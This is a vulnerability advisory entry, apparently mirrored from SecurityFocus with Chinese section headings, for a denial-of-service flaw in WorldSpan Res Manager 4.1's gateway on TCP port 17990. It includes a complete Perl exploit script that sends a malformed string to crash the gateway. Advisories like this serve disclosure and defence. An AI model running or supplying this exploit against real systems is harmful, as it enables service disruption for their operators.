-
漏洞信息 (21594)

source: http://www.securityfocus.com/bid/5169/info
It has been reported that WorldSpan Res Manager 4.1 for Microsoft Windows is vulnerable to a denial of service condition.
Res Manager systems are connected to Worldspan via private lines or through the Internet. Before accessing Worldspan, clients must first go through a local gateway, which accepts connections from Res Manager clients via TCP port 17990. If a malformed packet is sent to this port, the gateway software attempts to process the packet and eventually crashes.
#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS
$sabre = "worldspanshouldgoboom";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";
print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;

-
漏洞描述

Worldspan Res Manager contains a flaw that may allow a local or remote denial of service. The issue is triggered when an attacker sends a malformed packet to port 17990, and will result in loss of availability for the Res Manager software.

-
时间线

公开日期:
2002-07-04

发现日期:
Unknow

利用日期:Unknow

解决日期:Unknow

-
解决方案

The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.

-
受影响的程序版本

WorldSpan Res Manager 4.1

-
漏洞讨论

It has been reported that WorldSpan Res Manager 4.1 for Microsoft Windows is vulnerable to a denial of service condition.

Res Manager systems are connected to Worldspan via private lines or through the Internet. Before accessing Worldspan, clients must first go through a local gateway, which accepts connections from Res Manager clients via TCP port 17990. If a malformed packet is sent to this port, the gateway software attempts to process the packet and eventually crashes.

-
漏洞利用

An exploit has been provided by "altomo" &lt;altomo@digitalgangsters.net&gt;:

-
解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.